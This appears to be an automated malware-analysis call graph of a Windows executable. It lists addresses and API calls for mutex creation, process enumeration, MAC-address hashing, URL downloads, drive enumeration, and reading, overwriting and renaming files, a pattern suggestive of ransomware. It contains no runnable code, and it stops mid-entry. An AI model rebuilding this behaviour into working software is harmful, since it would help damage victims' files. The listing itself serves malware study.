CloseHandle 40959->40965 40975 41a3e2 GlobalFree 40961->40975 40976 41a3d4 Sleep 40961->40976 41536 411ab0 PeekMessageW 40961->41536 40962 41a6fe 40966 41a8b6 CreateMutexA 40962->40966 40967 41a70f 40962->40967 40963 41a618 40963->40966 40969 41a624 GetVersion 40963->40969 40970 41a5d4 40964->40970 40971 41a451 40965->40971 40973 41a8ca 40966->40973 40972 41a7d0 40967->40972 40980 40ef50 58 API calls 40967->40980 40969->40957 40977 41a632 lstrcpyW lstrcatW lstrcatW 40969->40977 41233 40d240 CoInitialize 40970->41233 40978 40ef50 58 API calls 40972->40978 40974 40ef50 58 API calls 40973->40974 40988 41a8da 40974->40988 40981 41a3f7 40975->40981 40976->40953 40982 41a674 _memset 40977->40982 40983 41a7ec 40978->40983 40991 41a72f 40980->40991 40986 41a6b4 ShellExecuteExW 40982->40986 40984 41a7f1 lstrlenA 40983->40984 40987 420c62 _malloc 58 API calls 40984->40987 40985->40957 40985->40962 40985->40963 40986->40962 40990 41a6e3 40986->40990 40989 41a810 _memset 40987->40989 40992 413ea0 59 API calls 40988->40992 41004 41a92f 40988->41004 40994 41a81e MultiByteToWideChar lstrcatW 40989->40994 41006 41a9d1 40990->41006 40993 413ea0 59 API calls 40991->40993 40996 41a780 40991->40996 40992->40988 40993->40991 40994->40984 40995 41a847 lstrlenW 40994->40995 40997 41a8a0 CreateMutexA 40995->40997 40998 41a856 40995->40998 40999 41a79c CreateThread 40996->40999 41002 413ff0 59 API calls 40996->41002 40997->40973 41315 40e760 40998->41315 40999->40972 42834 41dbd0 40999->42834 41001 415c10 59 API calls 41005 41a98c 41001->41005 41002->40999 41003 41a860 CreateThread WaitForSingleObject 41003->40997 42763 41e690 41003->42763 41004->41001 41326 412840 41005->41326 41008 41a997 41331 410fc0 CryptAcquireContextW 41008->41331 41010 41a9ab 41011 41a9c2 lstrlenA 41010->41011 41011->41006 41012 41a9d8 41011->41012 41013 415c10 59 API calls 41012->41013 41014 41aa23 41013->41014 41015 412840 60 API calls 41014->41015 41016 41aa2e lstrcpyA 41015->41016 41018 41aa4b 41016->41018 41019 415c10 59 API calls 41018->41019 41020 41aa90 41019->41020 41021 40ef50 58 API calls 41020->41021 41022 41aaa0 41021->41022 41023 413ea0 59 API calls 41022->41023 41024 41aaf5 41022->41024 41023->41022 41025 413ff0 59 API calls 41024->41025 41026 41ab1d 41025->41026 41354 412900 41026->41354 41028 40ef50 58 API calls 41030 41abc5 41028->41030 41029 41ab28 _memmove 41029->41028 41031 413ea0 59 API calls 41030->41031 41032 41ac1e 41030->41032 41031->41030 41033 413ff0 59 API calls 41032->41033 41034 41ac46 41033->41034 41035 412900 60 API calls 41034->41035 41037 41ac51 _memmove 41035->41037 41036 40ef50 58 API calls 41038 41acee 41036->41038 41037->41036 41039 413ea0 59 API calls 41038->41039 41040 41ad43 41038->41040 41039->41038 41041 413ff0 59 API calls 41040->41041 41042 41ad6b 41041->41042 41043 412900 60 API calls 41042->41043 41046 41ad76 _memmove 41043->41046 41044 415c10 59 API calls 41045 41ae2a 41044->41045 41359 413580 41045->41359 41046->41044 41048 41ae3c 41049 415c10 59 API calls 41048->41049 41050 41ae76 41049->41050 41051 413580 59 API calls 41050->41051 41052 41ae82 41051->41052 41053 415c10 59 API calls 41052->41053 41054 41aebc 41053->41054 41055 413580 59 API calls 41054->41055 41056 41aec8 41055->41056 41057 415c10 59 API calls 41056->41057 41058 41af02 41057->41058 41059 413580 59 API calls 41058->41059 41060 41af0e 41059->41060 41061 415c10 59 API calls 41060->41061 41062 41af48 41061->41062 41063 413580 59 API calls 41062->41063 41064 41af54 41063->41064 41065 415c10 59 API calls 41064->41065 41066 41af8e 41065->41066 41067 413580 59 API calls 41066->41067 41068 41af9a 41067->41068 41069 415c10 59 API calls 41068->41069 41070 41afd4 41069->41070 41071 413580 59 API calls 41070->41071 41072 41afe0 41071->41072 41073 413100 59 API calls 41072->41073 41074 41b001 41073->41074 41075 413580 59 API calls 41074->41075 41076 41b025 41075->41076 41077 413100 59 API calls 41076->41077 41078 41b03c 41077->41078 41079 413580 59 API calls 41078->41079 41080 41b059 41079->41080 41081 413100 59 API calls 41080->41081 41082 41b070 41081->41082 41083 413580 59 API calls 41082->41083 41084 41b07c 41083->41084 41085 413100 59 API calls 41084->41085 41086 41b093 41085->41086 41087 413580 59 API calls 41086->41087 41088 41b09f 41087->41088 41089 413100 59 API calls 41088->41089 41090 41b0b6 41089->41090 41091 413580 59 API calls 41090->41091 41092 41b0c2 41091->41092 41093 413100 59 API calls 41092->41093 41094 41b0d9 41093->41094 41095 413580 59 API calls 41094->41095 41096 41b0e5 41095->41096 41097 413100 59 API calls 41096->41097 41098 41b0fc 41097->41098 41099 413580 59 API calls 41098->41099 41100 41b108 41099->41100 41102 41b130 41100->41102 41542 41cdd0 59 API calls 41100->41542 41103 40ef50 58 API calls 41102->41103 41104 41b16e 41103->41104 41106 41b1a5 GetUserNameW 41104->41106 41366 412de0 41104->41366 41107 41b1c9 41106->41107 41373 412c40 41107->41373 41109 41b1d8 41380 412bf0 41109->41380 41113 41b2f5 41391 4136c0 41113->41391 41117 41b311 41407 4130b0 41117->41407 41120 412c40 59 API calls 41134 41b1f3 41120->41134 41122 412900 60 API calls 41122->41134 41123 41b327 41433 4111c0 CreateFileW 41123->41433 41124 413580 59 API calls 41124->41134 41126 41b33b 41518 41ba10 LoadCursorW RegisterClassExW 41126->41518 41128 413100 59 API calls 41128->41134 41129 41b343 41519 41ba80 CreateWindowExW 41129->41519 41131 41b34b 41131->41006 41522 410a50 GetLogicalDrives 41131->41522 41134->41113 41134->41120 41134->41122 41134->41124 41134->41128 41543 40f1f0 59 API calls 41134->41543 41135 41b379 41136 413100 59 API calls 41135->41136 41137 41b3a5 41136->41137 41138 413580 59 API calls 41137->41138 41161 41b3b3 41138->41161 41139 41b48b 41533 41fdc0 CreateThread 41139->41533 41141 41b49f GetMessageW 41142 41b4ed 41141->41142 41143 41b4bf 41141->41143 41146 41b502 PostThreadMessageW 41142->41146 41147 41b55b 41142->41147 41144 41b4c5 TranslateMessage DispatchMessageW GetMessageW 41143->41144 41144->41142 41144->41144 41145 41c330 59 API calls 41145->41161 41150 41b510 PeekMessageW 41146->41150 41148 41b564 PostThreadMessageW 41147->41148 41149 41b5bb 41147->41149 41151 41b570 PeekMessageW 41148->41151 41149->41006 41156 41b5d2 CloseHandle 41149->41156 41152 41b546 WaitForSingleObject 41150->41152 41153 41b526 DispatchMessageW PeekMessageW 41150->41153 41154 41b5a6 WaitForSingleObject 41151->41154 41155 41b586 DispatchMessageW PeekMessageW 41151->41155 41152->41147 41152->41150 41153->41152 41153->41153 41154->41149 41154->41151 41155->41154 41155->41155 41156->41006 41157 41c240 59 API calls 41157->41161 41158 41b8b0 59 API calls 41158->41161 41159 413260 59 API calls 41159->41161 41161->41139 41161->41145 41161->41157 41161->41158 41161->41159 41532 41fa10 CreateThread 41161->41532 41163 40cf32 _memset __write_nolock 41162->41163 41164 40cf4f InternetOpenW 41163->41164 41165 415c10 59 API calls 41164->41165 41166 40cf8a InternetOpenUrlW 41165->41166 41167 40cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 41166->41167 41173 40cfb2 41166->41173 41546 4156d0 41167->41546 41169 40d000 41170 4156d0 59 API calls 41169->41170 41171 40d049 41170->41171 41171->41173 41565 413010 41171->41565 41173->40910 41174 40d084 41174->41173 41175 413010 59 API calls 41174->41175 41175->41173 41177 413ab2 41176->41177 41178 413ad0 GetModuleFileNameW PathRemoveFileSpecW 41176->41178 41179 413b00 41177->41179 41180 413aba 41177->41180 41186 418400 41178->41186 41570 44f23e 59 API calls 2 library calls 41179->41570 41181 423b4c 59 API calls 41180->41181 41183 413ac7 41181->41183 41183->41178 41571 44f1bb 59 API calls 3 library calls 41183->41571 41187 418437 41186->41187 41191 418446 41186->41191 41187->41191 41572 415d50 41187->41572 41189 4184b9 41189->40935 41191->41189 41582 418d50 59 API calls 41191->41582 41193 42f7c0 __write_nolock 41192->41193 41194 41222d 7 API calls 41193->41194 41195 4122bd K32EnumProcesses 41194->41195 41196 41228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 41194->41196 41197 4122d3 41195->41197 41198 4122df 41195->41198 41196->41195 41197->40939 41199 412353 41198->41199 41200 4122f0 OpenProcess 41198->41200 41199->40939 41201 412346 CloseHandle 41200->41201 41202 41230a K32EnumProcessModules 41200->41202 41201->41199 41201->41200 41202->41201 41203 41231c K32GetModuleBaseNameW 41202->41203 41584 420235 41203->41584 41205 41233e 41205->41201 41206 412345 41205->41206 41206->41201 41208 420c62 _malloc 58 API calls 41207->41208 41209 40ef6e _memset 41208->41209 41210 40efdc 41209->41210 41211 420c62 _malloc 58 API calls 41209->41211 41210->40944 41211->41209 41213 413f05 41212->41213 41219 413eae 41212->41219 41214 413fb1 41213->41214 41215 413f18 41213->41215 41599 44f23e 59 API calls 2 library calls 41214->41599 41217 413fbb 41215->41217 41218 413f2d 41215->41218 41221 413f3d __expandlocale 41215->41221 41600 44f23e 59 API calls 2 library calls 41217->41600 41218->41221 41598 416760 59 API calls 2 library calls 41218->41598 41219->41213 41225 413ed4 41219->41225 41221->40944 41226 413ed9 41225->41226 41227 413eef 41225->41227 41596 413da0 59 API calls __expandlocale 41226->41596 41597 413da0 59 API calls __expandlocale 41227->41597 41231 413ee9 41231->40944 41232 413eff 41232->40944 41234 40d27d CoInitializeSecurity 41233->41234 41240 40d276 41233->41240 41235 414690 59 API calls 41234->41235 41236 40d2b8 CoCreateInstance 41235->41236 41237 40d2e3 VariantInit VariantInit VariantInit VariantInit 41236->41237 41238 40da3c CoUninitialize 41236->41238 41239 40d38e VariantClear VariantClear VariantClear VariantClear 41237->41239 41238->41240 41241 40d3e2 41239->41241 41242 40d3cc CoUninitialize 41239->41242 41240->40985 41601 40b140 41241->41601 41242->41240 41245 40d3f6 41606 40b1d0 41245->41606 41247 40d422 41248 40d426 CoUninitialize 41247->41248 41249 40d43c 41247->41249 41248->41240 41250 40b140 60 API calls 41249->41250 41252 40d449 41250->41252 41253 40b1d0 SysFreeString 41252->41253 41254 40d471 41253->41254 41255 40d496 CoUninitialize 41254->41255 41256 40d4ac 41254->41256 41255->41240 41258 40b140 60 API calls 41256->41258 41313 40d8cf 41256->41313 41259 40d4d5 41258->41259 41260 40b1d0 SysFreeString 41259->41260 41261 40d4fd 41260->41261 41262 40b140 60 API calls 41261->41262 41261->41313 41263 40d5ae 41262->41263 41264 40b1d0 SysFreeString 41263->41264 41265 40d5d6 41264->41265 41266 40b140 60 API calls 41265->41266 41265->41313 41267 40d679 41266->41267 41268 40b1d0 SysFreeString 41267->41268 41269 40d6a1 41268->41269 41270 40b140 60 API calls 41269->41270 41269->41313 41271 40d6b6 41270->41271 41272 40b1d0 SysFreeString 41271->41272 41273 40d6de 41272->41273 41274 40b140 60 API calls 41273->41274 41273->41313 41275 40d707 41274->41275 41276 40b1d0 SysFreeString 41275->41276 41277 40d72f 41276->41277 41278 40b140 60 API calls 41277->41278 41277->41313 41279 40d744 41278->41279 41280 40b1d0 SysFreeString 41279->41280 41281 40d76c 41280->41281 41281->41313 41610 423aaf GetSystemTimeAsFileTime 41281->41610 41283 40d77d 41612 423551 41283->41612 41288 412c40 59 API calls 41289 40d7b5 41288->41289 41290 412900 60 API calls 41289->41290 41291 40d7c3 41290->41291 41292 40b140 60 API calls 41291->41292 41293 40d7db 41292->41293 41294 40b1d0 SysFreeString 41293->41294 41295 40d7ff 41294->41295 41296 40b140 60 API calls 41295->41296 41295->41313 41297 40d8a3 41296->41297 41298 40b1d0 SysFreeString 41297->41298 41299 40d8cb 41298->41299 41300 40b140 60 API calls 41299->41300 41299->41313 41301 40d8ea 41300->41301 41302 40b1d0 SysFreeString 41301->41302 41303 40d912 41302->41303 41303->41313 41620 40b400 SysAllocString 41303->41620 41305 40d936 VariantInit VariantInit 41306 40b140 60 API calls 41305->41306 41307 40d985 41306->41307 41308 40b1d0 SysFreeString 41307->41308 41309 40d9e7 VariantClear VariantClear VariantClear 41308->41309 41310 40da10 41309->41310 41311 40da46 CoUninitialize 41309->41311 41624 42052a 78 API calls swprintf 41310->41624 41311->41240 41313->41238 41822 40e670 41315->41822 41317 413ea0 59 API calls 41319 40e7c3 41317->41319 41318 40e79e 41318->41317 41320 413ff0 59 API calls 41319->41320 41321 40e7ff 41320->41321 41848 40e870 41321->41848 41323 40e806 41324 413ff0 59 API calls 41323->41324 41325 40e80d 41323->41325 41324->41325 41325->41003 42106 413c40 41326->42106 41328 41288c WideCharToMultiByte 42116 4184e0 41328->42116 41330 4128cf 41330->41008 41332 41102b CryptCreateHash 41331->41332 41333 41101a 41331->41333 41335 411045 41332->41335 41336 411056 lstrlenA CryptHashData 41332->41336 42127 430eca RaiseException 41333->42127 42128 430eca RaiseException 41335->42128 41338 41107f CryptGetHashParam 41336->41338 41339 41106e 41336->41339 41341 41109f 41338->41341 41343 4110b0 _memset 41338->41343 42129 430eca RaiseException 41339->42129 42130 430eca RaiseException 41341->42130 41344 4110cf CryptGetHashParam 41343->41344 41345 4110f5 41344->41345 41346 4110e4 41344->41346 41348 420c62 _malloc 58 API calls 41345->41348 42131 430eca RaiseException 41346->42131 41349 411105 _memset 41348->41349 41350 411148 41349->41350 41351 4204a6 _sprintf 83 API calls 41349->41351 41352 41114e CryptDestroyHash CryptReleaseContext 41350->41352 41353 411133 lstrcatA 41351->41353 41352->41010 41353->41349 41353->41350 41355 413a90 59 API calls 41354->41355 41356 41294c MultiByteToWideChar 41355->41356 41357 418400 59 API calls 41356->41357 41358 41298d 41357->41358 41358->41029 41360 413591 41359->41360 41361 4135d6 41359->41361 41360->41361 41362 413597 41360->41362 41365 4135b7 41361->41365 42133 414f70 59 API calls 41361->42133 41362->41365 42132 414f70 59 API calls 41362->42132 41365->41048 41367 412dfa 41366->41367 41368 412dec 41366->41368 41371 413ea0 59 API calls 41367->41371 41369 413ea0 59 API calls 41368->41369 41370 412df5 41369->41370 41370->41104 41372 412e11 41371->41372 41372->41104 41374 412c71 41373->41374 41375 412c5f 41373->41375 41378 4156d0 59 API calls 41374->41378 41376 4156d0 59 API calls 41375->41376 41377 412c6a 41376->41377 41377->41109 41379 412c8a 41378->41379 41379->41109 41381 413ff0 59 API calls 41380->41381 41382 412c13 41381->41382 41383 40ecb0 41382->41383 41385 40ece5 41383->41385 41386 40eefc 41385->41386 42134 421b3b 59 API calls 3 library calls 41385->42134 41386->41134 41387 4156d0 59 API calls 41390 40ed6b _memmove 41387->41390 41388 415230 59 API calls 41388->41390 41390->41386 41390->41387 41390->41388 42135 421b3b 59 API calls 3 library calls 41390->42135 41392 413742 41391->41392 41393 4136e7 41391->41393 41394 41370d 41392->41394 42137 414f70 59 API calls 41392->42137 41393->41392 41395 4136ed 41393->41395 41397 41377f 41394->41397 41399 414690 59 API calls 41394->41399 41395->41394 42136 414f70 59 API calls 41395->42136 41400 40ca70 41397->41400 41399->41397 41401 40caa3 41400->41401 41405 40cb64 41400->41405 41402 40cb6b 41401->41402 41401->41405 41406 4136c0 59 API calls 41401->41406 42138 44f26c 59 API calls 3 library calls 41402->42138 41404 40cb75 41404->41117 41405->41117 41406->41401 41408 414690 59 API calls 41407->41408 41409 4130d4 41408->41409 41410 40c740 41409->41410 42139 420fdd 41410->42139 41413 40c944 CreateDirectoryW 41415 420fdd 115 API calls 41413->41415 41422 40c960 41415->41422 41416 40c90e 41416->41413 41425 40c96a 41416->41425 41417 40c906 41418 423a38 __fcloseall 83 API calls 41417->41418 41418->41416 41420 40c9d5 42142 4228fd 41420->42142 41422->41420 41422->41425 41427 4228fd _fputws 82 API calls 41422->41427 41423 40c9ed 41426 4228fd _fputws 82 API calls 41423->41426 41425->41123 41429 40c9f8 41426->41429 41427->41422 41428 40c79e _memmove 41428->41417 41430 415c10 59 API calls 41428->41430 41432 414f70 59 API calls 41428->41432 42169 421101 76 API calls 5 library calls 41428->42169 42170 420546 58 API calls __output_l 41428->42170 42155 423a38 41429->42155 41430->41428 41432->41428 41434 411223 GetFileSizeEx 41433->41434 41453 411287 41433->41453 41435 4112a3 VirtualAlloc 41434->41435 41436 411234 41434->41436 41437 41131a CloseHandle 41435->41437 41441 4112c0 _memset 41435->41441 41436->41435 41438 41123c CloseHandle 41436->41438 41437->41126 41439 413100 59 API calls 41438->41439 41440 411253 41439->41440 42406 4159d0 41440->42406 41443 4112e9 SetFilePointerEx 41441->41443 41475 4113a7 41441->41475 41446 411332 ReadFile 41443->41446 41447 41130c VirtualFree 41443->41447 41444 4113b7 SetFilePointer 41448 4113f5 ReadFile 41444->41448 41514 4115ae 41444->41514 41445 41126a MoveFileW 41445->41453 41446->41447 41449 41134f 41446->41449 41447->41437 41450 411440 41448->41450 41451 41140f VirtualFree CloseHandle 41448->41451 41449->41447 41454 411356 41449->41454 41457 411471 lstrlenA 41450->41457 41458 411718 lstrlenA 41450->41458 41450->41514 41455 41142f 41451->41455 41452 4115c5 SetFilePointerEx 41452->41451 41456 4115df 41452->41456 41453->41126 41454->41444 41462 412c40 59 API calls 41454->41462 41455->41126 41459 4115ed WriteFile 41456->41459 41464 411602 41456->41464 42432 420be4 41457->42432 42484 420be4 41458->42484 41459->41451 41459->41464 41460 4130b0 59 API calls 41466 411631 41460->41466 41468 411364 41462->41468 41464->41460 41470 412840 60 API calls 41466->41470 41468->41475 41476 411379 VirtualFree CloseHandle 41468->41476 41473 41163c WriteFile 41470->41473 41482 411658 41473->41482 41475->41444 41480 411396 41476->41480 41480->41126 41482->41451 41483 411660 lstrlenA WriteFile 41482->41483 41483->41451 41485 411686 CloseHandle 41483->41485 41487 413100 59 API calls 41485->41487 41488 4116a3 41487->41488 41490 4159d0 59 API calls 41488->41490 41491 4116be MoveFileW 41490->41491 41493 4116e4 VirtualFree 41491->41493 41497 4118a7 41491->41497 41496 4116fc 41493->41496 41496->41126 41500 4118e3 41497->41500 41501 4118d5 VirtualFree 41497->41501 41500->41453 41503 4118e8 CloseHandle 41500->41503 41501->41500 41503->41453 41514->41452 41518->41129 41520 41bab9 41519->41520 41521 41babb ShowWindow UpdateWindow 41519->41521 41520->41131 41521->41131 41529 410a81 41522->41529 41523 4156d0 59 API calls 41523->41529 41524 410bb4 41524->41135 41525 413ea0 59 API calls 41526 410ae0 SetErrorMode PathFileExistsA SetErrorMode 41525->41526 41527 410b0c GetDriveTypeA 41526->41527 41526->41529 41527->41529 41528 413ff0 59 API calls 41528->41529 41529->41523 41529->41524 41529->41525 41529->41528 41530 412900 60 API calls 41529->41530 41531 413580 59 API calls 41529->41531 41530->41529 41531->41529 41532->41161 42575 41f130 timeGetTime 41532->42575 41533->41141 42750 41fd80 41533->42750 41534->40916 41535->40952 41537 411af4 41536->41537 41538 411ad0 41536->41538 41537->40961 41539 411afc 41538->41539 41540 411adc DispatchMessageW PeekMessageW 41538->41540 41539->40961 41540->41537 41540->41538 41541->40962 41542->41102 41543->41134 41547 415735 41546->41547 41552 4156de 41546->41552 41548 4157bc 41547->41548 41549 41573e 41547->41549 41569 44f23e 59 API calls 2 library calls 41548->41569 41558 415750 __expandlocale 41549->41558 41568 416760 59 API calls 2 library calls 41549->41568 41552->41547 41556 415704 41552->41556 41559 415709 41556->41559 41560 41571f 41556->41560 41558->41169 41561 413ff0 59 API calls 41559->41561 41562 413ff0 59 API calls 41560->41562 41563 415719 41561->41563 41564 41572f 41562->41564 41563->41169 41564->41169 41566 413ff0 59 API calls 41565->41566 41567 41303e 41566->41567 41567->41174 41568->41558 41573 415d66 41572->41573 41574 415dfe 41572->41574 41576 416950 59 API calls 41573->41576 41581 415d84 __expandlocale 41573->41581 41583 44f23e 59 API calls 2 library calls 41574->41583 41578 415d76 41576->41578 41578->41191 41581->41191 41582->41191 41585 420241 41584->41585 41586 4202b6 41584->41586 41588 425208 __output_l 58 API calls 41585->41588 41593 420266 41585->41593 41595 4202c8 60 API calls 3 library calls 41586->41595 41590 42024d 41588->41590 41589 4202c3 41589->41205 41594 4242d2 9 API calls __output_l 41590->41594 41592 420258 41592->41205 41593->41205 41594->41592 41595->41589 41596->41231 41597->41232 41598->41221 41602 423b4c 59 API calls 41601->41602 41603 40b164 41602->41603 41604 40b177 SysAllocString 41603->41604 41605 40b194 41603->41605 41604->41605 41605->41245 41607 40b1de 41606->41607 41608 40b202 41606->41608 41607->41608 41609 40b1f5 SysFreeString 41607->41609 41608->41247 41609->41608 41611 423add __aulldiv 41610->41611 41611->41283 41625 43035d 41612->41625 41614 42355a 41615 40d78f 41614->41615 41633 423576 41614->41633 41617 4228e0 41615->41617 41771 42279f 41617->41771 41621 40b423 41620->41621 41622 40b41d 41620->41622 41623 40b42d VariantClear 41621->41623 41622->41305 41623->41305 41624->41313 41626 42501f __getptd_noexit 58 API calls 41625->41626 41627 430363 41626->41627 41628 430369 41627->41628 41630 43038d 41627->41630 41666 428cde 58 API calls 2 library calls 41627->41666 41629 425208 __output_l 58 API calls 41628->41629 41628->41630 41631 43036e 41629->41631 41630->41614 41631->41614 41634 423591 41633->41634 41635 4235a9 _memset 41633->41635 41636 425208 __output_l 58 API calls 41634->41636 41635->41634 41642 4235c0 41635->41642 41637 423596 41636->41637 41675 4242d2 9 API calls __output_l 41637->41675 41639 4235cb 41641 425208 __output_l 58 API calls 41639->41641 41640 4235e9 41667 42fb64 41640->41667 41665 4235a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 41641->41665 41642->41639 41642->41640 41644 4235ee 41676 42f803 58 API calls __output_l 41644->41676 41646 4235f7 41647 4237e5 41646->41647 41677 42f82d 58 API calls __output_l 41646->41677 41690 4242fd 8 API calls 2 library calls 41647->41690 41650 423609 41650->41647 41678 42f857 41650->41678 41651 4237ef 41653 42361b 41653->41647 41654 423624 41653->41654 41655 42369b 41654->41655 41657 423637 41654->41657 41688 42f939 58 API calls 4 library calls 41655->41688 41685 42f939 58 API calls 4 library calls 41657->41685 41658 4236a2 41658->41665 41689 42fbb4 58 API calls 3 library calls 41658->41689 41660 42364f 41660->41665 41686 42fbb4 58 API calls 3 library calls 41660->41686 41663 423668 41663->41665 41687 42f939 58 API calls 4 library calls 41663->41687 41665->41615 41666->41628 41668 42fb70 __initptd 41667->41668 41669 42fba5 __initptd 41668->41669 41691 428af7 41668->41691 41669->41644 41671 42fb80 41672 42fb93 41671->41672 41698 42fe47 41671->41698 41727 42fbab LeaveCriticalSection _doexit 41672->41727 41675->41665 41676->41646 41677->41650 41679 42f861 41678->41679 41680 42f876 41678->41680 41681 425208 __output_l 58 API calls 41679->41681 41680->41653 41682 42f866 41681->41682 41770 4242d2 9 API calls __output_l 41682->41770 41684 42f871 41684->41653 41685->41660 41686->41663 41687->41665 41688->41658 41689->41665 41690->41651 41692 428b1b EnterCriticalSection 41691->41692 41693 428b08 41691->41693 41692->41671 41728 428b9f 41693->41728 41695 428b0e 41695->41692 41752 427c2e 58 API calls 4 library calls 41695->41752 41697 428b1a 41697->41692 41699 42fe53 __initptd 41698->41699 41700 428af7 __lock 58 API calls 41699->41700 41701 42fe71 __tzset_nolock 41700->41701 41702 42f857 __tzset_nolock 58 API calls 41701->41702 41703 42fe86 41702->41703 41715 42ff25 __tzset_nolock 41703->41715 41760 42f803 58 API calls __output_l 41703->41760 41706 42fe98 41706->41715 41761 42f82d 58 API calls __output_l 41706->41761 41707 42ff71 GetTimeZoneInformation 41707->41715 41710 42feaa 41710->41715 41762 433f99 58 API calls 2 library calls 41710->41762 41711 42ffd8 WideCharToMultiByte 41711->41715 41713 42feb8 41763 441667 78 API calls 3 library calls 41713->41763 41715->41707 41715->41711 41716 430010 WideCharToMultiByte 41715->41716 41720 43ff8e 58 API calls __tzset_nolock 41715->41720 41725 430157 __tzset_nolock __initptd 41715->41725 41726 423c2d 61 API calls UnDecorator::getTemplateConstant 41715->41726 41767 4242fd 8 API calls 2 library calls 41715->41767 41768 420bed 58 API calls 2 library calls 41715->41768 41769 4300d7 LeaveCriticalSection _doexit 41715->41769 41716->41715 41717 42fed9 __tzset_nolock 41717->41715 41719 42ff0c _strlen 41717->41719 41764 420bed 58 API calls 2 library calls 41717->41764 41765 428cde 58 API calls 2 library calls 41719->41765 41720->41715 41723 42ff1a _strlen 41723->41715 41766 42c0fd 58 API calls __output_l 41723->41766 41725->41672 41726->41715 41727->41669 41729 428bab __initptd 41728->41729 41730 428bb4 41729->41730 41731 428bcc 41729->41731 41753 427f51 58 API calls 2 library calls 41730->41753 41740 428bed __initptd 41731->41740 41756 428cde 58 API calls 2 library calls 41731->41756 41734 428bb9 41754 427fae 58 API calls 8 library calls 41734->41754 41735 428be1 41738 428bf7 41735->41738 41739 428be8 41735->41739 41737 428bc0 41755 427b0b GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 41737->41755 41743 428af7 __lock 58 API calls 41738->41743 41742 425208 __output_l 58 API calls 41739->41742 41740->41695 41742->41740 41745 428bfe 41743->41745 41746 428c23 41745->41746 41747 428c0b 41745->41747 41758 420bed 58 API calls 2 library calls 41746->41758 41757 43263e InitializeCriticalSectionAndSpinCount 41747->41757 41750 428c17 41759 428c3f LeaveCriticalSection _doexit 41750->41759 41752->41697 41753->41734 41754->41737 41756->41735 41757->41750 41758->41750 41759->41740 41760->41706 41761->41710 41762->41713 41763->41717 41764->41719 41765->41723 41766->41715 41767->41715 41768->41715 41769->41715 41770->41684 41798 42019c 41771->41798 41774 4227d4 41775 425208 __output_l 58 API calls 41774->41775 41776 4227d9 41775->41776 41806 4242d2 9 API calls __output_l 41776->41806 41777 4227e9 MultiByteToWideChar 41780 422804 GetLastError 41777->41780 41781 422815 41777->41781 41779 40d7a3 41779->41288 41807 4251e7 58 API calls 2 library calls 41780->41807 41808 428cde 58 API calls 2 library calls 41781->41808 41784 422810 41812 420bed 58 API calls 2 library calls 41784->41812 41785 42281d 41785->41784 41786 422825 MultiByteToWideChar 41785->41786 41786->41780 41787 42283f 41786->41787 41809 428cde 58 API calls 2 library calls 41787->41809 41790 4228a0 41813 420bed 58 API calls 2 library calls 41790->41813 41791 42284a 41791->41784 41810 42d51e 88 API calls 3 library calls 41791->41810 41794 422866 41794->41784 41795 42286f WideCharToMultiByte 41794->41795 41795->41784 41796 42288b GetLastError 41795->41796 41811 4251e7 58 API calls 2 library calls 41796->41811 41799 4201ad 41798->41799 41804 4201fa 41798->41804 41814 425007 41799->41814 41803 4201da 41803->41804 41820 42495e 58 API calls 5 library calls 41803->41820 41804->41774 41804->41777 41806->41779 41807->41784 41808->41785 41809->41791 41810->41794 41811->41784 41812->41790 41813->41779 41815 42501f __getptd_noexit 58 API calls 41814->41815 41816 42500d 41815->41816 41817 4201b3 41816->41817 41821 427c2e 58 API calls 4 library calls 41816->41821 41817->41803 41819 4245dc 58 API calls 5 library calls 41817->41819 41819->41803 41820->41804 41821->41817 41823 420c62 _malloc 58 API calls 41822->41823 41824 40e684 41823->41824 41825 420c62 _malloc 58 API calls 41824->41825 41826 40e690 41825->41826 41827 40e6b4 GetAdaptersInfo 41826->41827 41828 40e699 41826->41828 41830 40e6c4 41827->41830 41831 40e6db GetAdaptersInfo 41827->41831 41829 421f2d _wprintf 85 API calls 41828->41829 41833 40e6a3 41829->41833 41901 420bed 58 API calls 2 library calls 41830->41901 41832 40e6ea 41831->41832 41847 40e741 41831->41847 41872 4204a6 41832->41872 41900 420bed 58 API calls 2 library calls 41833->41900 41838 40e6ca 41842 420c62 _malloc 58 API calls 41838->41842 41840 40e6a9 41840->41318 41841 40e74a 41841->41318 41844 40e6d2 41842->41844 41844->41828 41844->41831 41845 40e737 41846 421f2d _wprintf 85 API calls 41845->41846 41846->41847 41902 420bed 58 API calls 2 library calls 41847->41902 41849 4156d0 59 API calls 41848->41849 41850 40e8bb CryptAcquireContextW 41849->41850 41851 40e8d8 41850->41851 41852 40e8e9 CryptCreateHash 41850->41852 42101 430eca RaiseException 41851->42101 41854 40e903 41852->41854 41855 40e914 CryptHashData 41852->41855 42102 430eca RaiseException 41854->42102 41857 40e932 41855->41857 41858 40e943 CryptGetHashParam 41855->41858 42103 430eca RaiseException 41857->42103 41860 40e963 41858->41860 41862 40e974 _memset 41858->41862 42104 430eca RaiseException 41860->42104 41863 40e993 CryptGetHashParam 41862->41863 41864 40e9a8 41863->41864 41871 40e9b9 41863->41871 42105 430eca RaiseException 41864->42105 41866 40ea10 41868 40ea16 CryptDestroyHash CryptReleaseContext 41866->41868 41867 4204a6 _sprintf 83 API calls 41867->41871 41869 40ea33 41868->41869 41869->41323 41870 413ea0 59 API calls 41870->41871 41871->41866 41871->41867 41871->41870 41873 4204c2 41872->41873 41874 4204d7 41872->41874 41875 425208 __output_l 58 API calls 41873->41875 41874->41873 41876 4204de 41874->41876 41877 4204c7 41875->41877 41904 426ab6 41876->41904 41903 4242d2 9 API calls __output_l 41877->41903 41881 40e725 41883 421f2d 41881->41883 41884 421f39 __initptd 41883->41884 41885 421f4a 41884->41885 41886 421f5f __flsbuf 41884->41886 41887 425208 __output_l 58 API calls 41885->41887 41949 420e92 41886->41949 41888 421f4f 41887->41888 41965 4242d2 9 API calls __output_l 41888->41965 41891 421f6f __flsbuf 41954 42afd2 41891->41954 41892 421f5a __initptd 41892->41845 41894 421f82 __flsbuf 41895 426ab6 __output_l 83 API calls 41894->41895 41896 421f9b __flsbuf 41895->41896 41961 42afa1 41896->41961 41900->41840 41901->41838 41902->41841 41903->41881 41905 42019c _LocaleUpdate::_LocaleUpdate 58 API calls 41904->41905 41906 426b2b 41905->41906 41907 425208 __output_l 58 API calls 41906->41907 41908 426b30 41907->41908 41909 427601 41908->41909 41922 426b50 __output_l __aulldvrm _strlen 41908->41922 41936 42816b 41908->41936 41910 425208 